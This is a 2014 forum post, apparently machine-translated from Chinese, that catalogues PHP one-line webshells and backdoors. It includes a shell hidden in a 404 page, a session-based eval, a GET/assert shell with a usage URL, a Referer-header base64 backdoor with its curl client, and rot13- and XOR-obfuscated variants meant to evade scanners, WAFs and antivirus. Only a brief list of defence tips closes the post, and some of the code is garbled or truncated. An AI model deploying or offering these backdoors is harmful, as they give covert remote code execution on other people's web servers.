We treat these PHP backdoor programs with a learning mentality, and a lot of PHP backdoor code allows us to see how well-intentioned programmers are.
Powerful PHP backdoor in one sentence
This kind of backdoor allows websites,Server administrators are very troublesome and often have to change methods to perform various detections, and many new writing techniques cannot be discovered and dealt with with ordinary detection methods.
Today we will count some interesting PHP Trojans.
1. Hide PHP ponies using 404 pages:
[mw_shl_code=php,true] <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace(“/[pageerror]/e”,$_POST[‘error’],“saft”);
header(‘HTTP/1.1 404 Not Found’);
?>[/mw_shl_code]
404 page is a commonly used file on the website, and few people will check and modify it after it is generally recommended, so we can use this to hide the backdoor.
2. Featureless hidden PHP in one sentence:
[mw_shl_code=php,true]<?php
session_start();
$_POST[‘code’] && $_SESSION[‘theCode’] = trim($_POST[‘code’]);
$_SESSION[‘theCode’]&&preg_replace(‘\’a\’eis’,‘e’.‘ v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\’theCode\’]))’,‘a’);
?>[/mw_shl_code]
Assign $_POST['code'] to $_SESSION['theCode'], and then execute $_SESSION['theCode'], with the highlight being that there is no signature code.
If you use a scanning tool to check the code, it will not alarm and achieve the goal.
3. Super Stealthy PHP Backdoor:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
The GET function alone constitutes a Trojan;
How to use:
[mw_shl_code=php,true]
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
After execution, the current directory generates c.php a sentence Trojan, when the parameter A is eval, the error Trojan generation failed, and when it is assert, it will also report an error, but it will generate a Trojan horse, which can not be underestimated.
Level request, code to run PHP backdoor:
This method is implemented with two files, file 1
[mw_shl_code=php,true]<?php
//1.php
header(‘Content-type:text/html; charset=utf-8′);
parse_str($_SERVER[‘HTTP_REFERER’], $a);
if(reset($a) == ’10’&& count($a) == 9) {
eval(base64_decode(str_replace(” “, “+”, implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Document 2
[mw_shl_code=php,true]<?php
//2.php
header(‘Content-type:text/html; charset=utf-8′);
//要执行的代码
$code= <<<CODE
phpinfo();
CODE;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= “a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=”;
//后门url
$url= ‘http://localhost/test1/1.php’;
$ch= curl_init();
$options= array(
CURLOPT_URL => $url,
CURLOPT_HEADER => FALSE,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Run base64-encoded code through the HTTP_REFERER in the HTTP request to achieve the backdoor effect.
It's good to use this idea to bypass waf.
4.PHP backdoor generator tool weevely
weevely is a PHP-specific oneWebshell free software, can be used to simulate a connection shell similar to telnet, Weevely is usually used for web program exploitation, hide backdoors or use telnet-like methods instead of web page-based management, the server-side PHP code generated by Weevely is base64 encoded, so it can deceive mainstream antivirus software and IDS, Once you upload the server-side code, you can usually run it directly through Weevely.
The functions used in the backdoor are commonly used string processing functions, and the functions such as eval and system that are used as inspection rules will not appear directly in the code, so that the backdoor file can bypass the check of the backdoor search tool. Scanning with the dark group's web backdoor detection tool shows that the file is not threatened.
The above is a general introduction, and the relevant usage methods are not introduced here, a simple science popularization.
4. Three deformed one-sentence PHP Trojans
The first one:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
The second
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ �”). ($_[+“”]|“”). ($_[+“”]^“�”);
?>
<?php ${‘_’.$_}[‘_’](${‘_’.$_}[‘__’]);?>[/mw_shl_code]
Write http://site/2.php?_=assert&__=eval($_POST['pass']) password in the kitchen knife is pass.
If you use the additional data of the kitchen knife, it is more hidden, or you can use other injection tools, because it is post submitted.
The third
[mw_shl_code=php,true] ($b4dboy= $_POST[‘b4dboy’]) && @preg_replace(‘/ad/e’,‘@’.str_rot13(‘riny’).‘ ($b4dboy)’, ‘add’); [/mw_shl_code]
str_rot13 ('riny') is the encoded eval, which completely avoids keywords without losing the effect, making people vomit blood!
5. Finally, list a few advanced PHP Trojan back doors:
1、
[mw_shl_code=php,true]$hh= “p”.“ r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh(“/[discuz]/e”,$_POST[‘h’],“Access”); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET[‘xbid’];
include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg=“c”.“ o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= “p”.“ r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid(“/[discuz]/e”,$_POST[‘h’],“Access”); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
To sum up, these PHP backdoors can be described as complete, if you are not careful, you will definitely be tricked, and what is the top priority of our article today? The key points are in the summary below!
How to deal with PHP one-sentence backdoor:
We emphasize a few key points, and if you read this article, I believe you are not a layman, so I won't be long-winded:
- Be aware of security when writing PHP programs
- Server log files should be read frequently and backed up frequently
- Strict permission assignment for each site
- Frequent batch security reviews of dynamic files and directories
- Learn how to carry out manual anti-virus "Behavioral Judgment Investigation and Killing"
- Stay tuned, or infiltrate an active cybersecurity camp
- Even a function can be used as a rule for hierarchical processing of the server environment
We believe that when there are more sites to manage and a large amount of data, we should reasonably apply some auxiliary tools, but we should not completely rely on these tools, technology is always updating and improving, the most important thing is that you should learn and understand the thinking of writing these powerful backdoor people, and the role transposition can bring you greater progress.
|
Posted on 12/1/2014 9:41:13 PM
